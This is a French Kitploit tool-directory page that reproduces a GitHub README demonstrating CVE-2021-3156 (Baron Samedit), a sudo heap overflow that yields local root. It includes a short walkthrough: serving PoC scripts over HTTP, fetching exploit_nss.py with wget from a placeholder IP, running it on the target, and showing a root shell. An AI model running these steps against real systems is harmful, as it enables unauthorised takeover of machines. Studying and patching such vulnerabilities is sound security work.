Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/topskiypavelqwertygang/review.cve-2021-3156
Escalade de PrivilègesAnalyse des VulnérabilitésExploitationTests d'IntrusionRed TeamingExploitation de Binaires
GitHubtopskiypavelqwertygang/review.cve-2021-3156

Review.CVE-2021-3156

CVE-2021-3156-Exploit-Demo

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
43il y a 1 anPas encore vérifié

👑 CVE-2021-3156 (Baron Samedit) — Élévation de privilèges via un débordement de tas dans sudo

📅 Date : 2025-06-08
✍️ Auteur : @TopskiyPavelQwertyGang 🧠 Chercheur en sécurité | Passionné de Red Team


🧠 Vue d'ensemble de la CVE

  • CVE-ID : CVE-2021-3156
  • Type : Débordement de tampon basé sur le tas
  • Composant : sudoedit (sudo)
  • Niveau d'accès : Local
  • Objectif : Obtention des privilèges root

🧠 Description

Un débordement de tas dans sudoedit permet à un utilisateur local d'obtenir un accès root
lors de l'exécution de la commande sudoedit avec des paramètres spécialement préparés.

L'exploitation est active pour les versions de sudo < 1.9.5p2, y compris les images populaires Ubuntu/Debian/CentOS.
Même avec ASLR activé, la vulnérabilité reste exploitable.


🐾 Conditions d'exploitation

root@kitploit:~
OS     : Ubuntu 20.04.3 LTS
glibc  : 2.31 (tcache ON)
sudo   : 1.8.31 (уязвим)
ASLR   : 2 (включён)

🧪 Préparation de l'environnement

  1. Vérification des versions de glibc et sudo :
root@kitploit:~
ldd --version
sudo --version
  1. Transfert des scripts PoC depuis une autre machine via le serveur HTTP intégré :
root@kitploit:~
python3 -m http.server 80
  1. Sur la machine cible, les scripts PoC sont téléchargés et exécutés :
root@kitploit:~
wget http://<IP>:80/exploit_nss.py
python3 exploit_nss.py

🚀 Exploitation réussie du PoC

root@kitploit:~
$ python3 exploit_nss.py
# whoami
root

🧾 Conclusion

L'exploitation de CVE-2021-3156 reste possible même avec ASLR actif, si glibc ≥ 2.26 et sudo est une version vulnérable.
L'exploit exploit_nss.py s'est avéré le plus stable, fonctionnant du premier coup avec une configuration NSS correcte.

🧨 Système sous contrôle.


Télécharger l’outil